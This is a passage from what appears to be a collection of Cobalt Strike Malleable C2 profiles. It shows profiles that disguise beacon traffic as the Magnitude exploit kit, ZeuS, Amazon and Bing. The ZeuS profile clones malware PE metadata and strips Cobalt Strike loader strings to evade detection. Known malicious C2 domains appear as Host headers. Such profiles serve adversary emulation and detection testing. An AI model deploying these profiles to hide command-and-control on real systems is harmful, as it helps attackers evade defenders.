| output { 67 | print; 68 | } 69 | } 70 | } 71 | 72 | -------------------------------------------------------------------------------- /crimeware/magnitude.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Magnitude Exploit Kit traffic profile 3 | # http://malware-traffic-analysis.net/2014/06/17/index.html 4 | # 5 | # Author: @harmj0y 6 | # 7 | set sample_name "Magnitude Exploit Kit"; 8 | 9 | set sleeptime "45000"; # use a ~45s delay between callbacks 10 | set jitter "50"; # throw in a 50% jitter 11 | set maxdns "255"; 12 | set useragent "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"; 13 | 14 | http-get { 15 | 16 | set uri "/themes/index.php"; 17 | 18 | client { 19 | 20 | header "Accept" "image/jpeg, application/*"; 21 | header "Referer" "http://www.bankofbotswana.bw/"; 22 | header "Accept-Encoding" "gzip, deflate"; 23 | 24 | # throw in a known bad malware domain 25 | header "Host" "wilfredcostume.bamoon.com"; 26 | 27 | metadata { 28 | netbios; 29 | parameter "id"; 30 | } 31 | } 32 | 33 | server { 34 | header "Server" "Apache/2.2.17 (Ubuntu)"; 35 | header "X-Powered-By" "PHP/5.3.5-1ubuntu7.8"; 36 | header "Content-Encoding" "gzip"; 37 | header "Content-Type" "text/html"; 38 | 39 | output { 40 | print; 41 | } 42 | } 43 | } 44 | 45 | http-post { 46 | 47 | set uri "/work/1.php"; 48 | 49 | client { 50 | 51 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 52 | header "Accept-Language" "en-US;q=0.5,en;q=0.3"; 53 | header "Accept-Encoding" "gzip, deflate"; 54 | header "Content-Type" "application/octet-stream"; 55 | 56 | id { 57 | netbiosu; 58 | parameter "sid"; 59 | } 60 | 61 | output { 62 | print; 63 | } 64 | } 65 | 66 | server { 67 | 68 | header "Server" "Apache/2.2.17 (Ubuntu)"; 69 | header "X-Powered-By" "PHP/5.3.5-1ubuntu7.8"; 70 | header "Content-Encoding" "gzip"; 71 | header "Content-Type" "text/html"; 72 | 73 | output { 74 | print; 75 | } 76 | } 77 | } 78 | 79 | -------------------------------------------------------------------------------- /crimeware/zeus.profile: -------------------------------------------------------------------------------- 1 | # 2 | # ZeuS Sample Profile 3 | # client - https://malwr.com/analysis/NjIwNTU2ODA2OTUxNDcwNmJiMTMzYzk4YzU4NWQyZDQ/ 4 | # server - http://malware-traffic-analysis.net/2014/04/05/index.html 5 | # 6 | # Author: @harmj0y 7 | # 8 | set sample_name "ZeuS"; 9 | 10 | set sleeptime "30000"; 11 | set jitter "5"; 12 | set maxdns "255"; 13 | set useragent "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1)"; 14 | 15 | # Sample from: https://malshare.com/sample.php?action=detail&hash=1da10c6412b79fe8ffcbb5d1901144ee 16 | stage { 17 | # ./peclone 1da10c6412b79fe8ffcbb5d1901144ee 18 | set checksum "0"; 19 | set compile_time "24 Mar 2011 07:36:23"; 20 | set entry_point "93589"; 21 | set rich_header "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 22 | set stomppe "false"; 23 | 24 | # strings -e l 1da10c6412b79fe8ffcbb5d1901144ee 25 | stringw "nspr4.dll"; 26 | stringw ".tmp"; 27 | stringw "DISPLAY"; 28 | stringw "SeShutdownPrivilege"; 29 | stringw "cGlobal\\%08X%08X%08X"; 30 | stringw "TSeTcbPrivilege"; 31 | stringw ".exe"; 32 | stringw "SOFTWARE\\Microsoft"; 33 | stringw "SysListView32"; 34 | stringw "MDIClient"; 35 | stringw "CiceroUIWndFrame"; 36 | stringw "ConsoleWindowClass"; 37 | stringw "#32768"; 38 | stringw "SysShadow"; 39 | stringw "e.dat"; 40 | stringw "kernel32.dll"; 41 | stringw "\"%s\""; 42 | stringw "\"%s\" %s"; 43 | stringw "/c \"%s\""; 44 | stringw "ComSpec"; 45 | stringw "S:(ML;;NRNWNX;;;LW)"; 46 | stringw "SeSecurityPrivilege"; 47 | stringw "S:(ML;CIOI;NRNWNX;;;LW)"; 48 | stringw "Global\\"; 49 | stringw "Local\\"; 50 | stringw "%s%08x.%s"; 51 | stringw "%s%08x"; 52 | 53 | # strings 1da10c6412b79fe8ffcbb5d1901144ee 54 | string "del \"%s\""; 55 | string "if exist \"%s\" goto d"; 56 | string "@echo off"; 57 | string "del /F \"%s\""; 58 | 59 | # get rid of some standard Cobalt Strike stuff. 60 | transform-x86 { 61 | strrep "beacon.dll" ""; 62 | strrep "ReflectiveLoader" ""; 63 | } 64 | 65 | transform-x64 { 66 | strrep "beacon.x64.dll" ""; 67 | strrep "ReflectiveLoader" ""; 68 | } 69 | } 70 | 71 | http-get { 72 | 73 | set uri "/metro91/admin/1/ppptp.jpg"; 74 | 75 | client { 76 | 77 | header "Accept" "*/*"; 78 | header "Connection" "Close"; 79 | 80 | # throw in a known/old Zeus C2 domain 81 | header "Host" "mahamaya1ifesciences.com"; 82 | header "Cache-Control" "no-cache"; 83 | 84 | metadata { 85 | base64; 86 | header "Cookie"; 87 | } 88 | } 89 | 90 | server { 91 | header "Server" "nginx/1.0.4"; 92 | header "Content-Type" "text/html"; 93 | header "Connection" "close"; 94 | header "X-Powered-By" "PHP/5.3.8-1~dotdeb.2"; 95 | 96 | output { 97 | print; 98 | } 99 | } 100 | } 101 | 102 | http-post { 103 | 104 | set uri "/metro91/admin/1/secure.php"; 105 | 106 | client { 107 | 108 | header "Accept" "*/*"; 109 | header "Connection" "Keep-Alive"; 110 | 111 | # throw in a known/old Zeus C2 domain 112 | header "Host" "mahamaya1ifesciences.com"; 113 | header "Cache-Control" "no-cache"; 114 | 115 | id { 116 | netbios; 117 | parameter "id"; 118 | } 119 | 120 | output { 121 | print; 122 | } 123 | } 124 | 125 | server { 126 | header "Server" "nginx/1.0.4"; 127 | header "Content-Type" "text/html"; 128 | header "Connection" "close"; 129 | header "X-Powered-By" "PHP/5.3.8-1~dotdeb.2"; 130 | 131 | output { 132 | print; 133 | } 134 | } 135 | } 136 | 137 | -------------------------------------------------------------------------------- /normal/amazon.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Amazon browsing traffic profile 3 | # 4 | # Author: @harmj0y 5 | # 6 | 7 | set sleeptime "5000"; 8 | set jitter "0"; 9 | set maxdns "255"; 10 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; 11 | 12 | http-get { 13 | 14 | set uri "/s/ref=nb_sb_noss_1/167-3294888-0262949/field-keywords=books"; 15 | 16 | client { 17 | 18 | header "Accept" "*/*"; 19 | header "Host" "www.amazon.com"; 20 | 21 | metadata { 22 | base64; 23 | prepend "session-token="; 24 | prepend "skin=noskin;"; 25 | append "csm-hit=s-24KU11BB82RZSYGJ3BDK|1419899012996"; 26 | header "Cookie"; 27 | } 28 | } 29 | 30 | server { 31 | 32 | header "Server" "Server"; 33 | header "x-amz-id-1" "THKUYEZKCKPGY5T42PZT"; 34 | header "x-amz-id-2" "a21yZ2xrNDNtdGRsa212bGV3YW85amZuZW9ydG5rZmRuZ2tmZGl4aHRvNDVpbgo="; 35 | header "X-Frame-Options" "SAMEORIGIN"; 36 | header "Content-Encoding" "gzip"; 37 | 38 | output { 39 | print; 40 | } 41 | } 42 | } 43 | 44 | http-post { 45 | 46 | set uri "/N4215/adj/amzn.us.sr.aps"; 47 | 48 | client { 49 | 50 | header "Accept" "*/*"; 51 | header "Content-Type" "text/xml"; 52 | header "X-Requested-With" "XMLHttpRequest"; 53 | header "Host" "www.amazon.com"; 54 | 55 | parameter "sz" "160x600"; 56 | parameter "oe" "oe=ISO-8859-1;"; 57 | 58 | id { 59 | parameter "sn"; 60 | } 61 | 62 | parameter "s" "3717"; 63 | parameter "dc_ref" "http%3A%2F%2Fwww.amazon.com"; 64 | 65 | output { 66 | base64; 67 | print; 68 | } 69 | } 70 | 71 | server { 72 | 73 | header "Server" "Server"; 74 | header "x-amz-id-1" "THK9YEZJCKPGY5T42OZT"; 75 | header "x-amz-id-2" "a21JZ1xrNDNtdGRsa219bGV3YW85amZuZW9zdG5rZmRuZ2tmZGl4aHRvNDVpbgo="; 76 | header "X-Frame-Options" "SAMEORIGIN"; 77 | header "x-ua-compatible" "IE=edge"; 78 | 79 | output { 80 | print; 81 | } 82 | } 83 | } 84 | -------------------------------------------------------------------------------- /normal/bingsearch_getonly.profile: -------------------------------------------------------------------------------- 1 | # 2 | # Bing Web Search 3 | # 4 | # Author: @bluscreenofjeff 5 | # 6 | 7 | https-certificate { 8 | set CN "www.bing.com"; 9 | set O "Microsoft Corporation"; 10 | set C "US"; 11 | set L "Redmond"; 12 | set OU "Microsoft IT"; 13 | set ST "WA"; 14 | set validity "365"; 15 | } 16 | 17 | set sleeptime "60000"; 18 | set jitter "20"; 19 | set useragent "Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"; 20 | set dns_idle "8.8.4.4"; 21 | set maxdns "235"; 22 | 23 | http-get { 24 | 25 | set uri "/search/"; 26 | 27 | client { 28 | 29 | header "Host" "www.bing.com"; 30 | header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"; 31 | header "Cookie" "DUP=Q=GpO1nJpMnam4UllEfmeMdg2&T=283767088&A=1&IG"; 32 | 33 | metadata { 34 | base64url; 35 | parameter "q"; 36 | } 37 | 38 | parameter "go" "Search"; 39 | parameter "qs" "bs"; 40 | parameter "form" "QBRE"; 41 | 42 | 43 | } 44 | 45 | server { 46 | 47 | header "Cache-Control" "private, max-age=0"; 48 | header "Content-Type" "text/html; charset=utf-8"; 49 | header "Vary" "Accept-Encoding"; 50 | header "Server" "Microsoft-IIS/8.5"; 51 | header "Connection" "close"; 52 | 53 | 54 | output { 55 | netbios; 56 | prepend "Bing